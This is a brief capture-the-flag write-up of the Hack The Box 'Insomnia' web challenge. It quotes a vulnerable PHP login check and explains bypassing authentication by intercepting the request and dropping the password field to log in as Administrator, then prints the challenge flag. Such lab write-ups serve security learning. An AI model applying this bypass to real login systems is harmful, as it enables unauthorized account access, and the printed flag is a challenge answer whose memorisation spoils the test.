This is a writeup of the Insomnia challenge which is a web challenge from Hack The Box.

First register a account: asdf:asdf

From ProfileController.php we know that the flag is shown if the user is logged in as Administrator

From UserController.php we know that the login only verifies user name if no password provided.

$db = db_connect();
$json_data = request()->getJSON(true);
if (!count($json_data) == 2) {
    return $this->respond("Please provide username and password", 404);
}
$query = $db->table("users")->getWhere($json_data, 1, 0);
$result = $query->getRowArray();

Intercept login with burp

change username remove password

Flag

This gives us the flag:

HTB{I_just_want_to_sleep_a_little_bit!!!!!}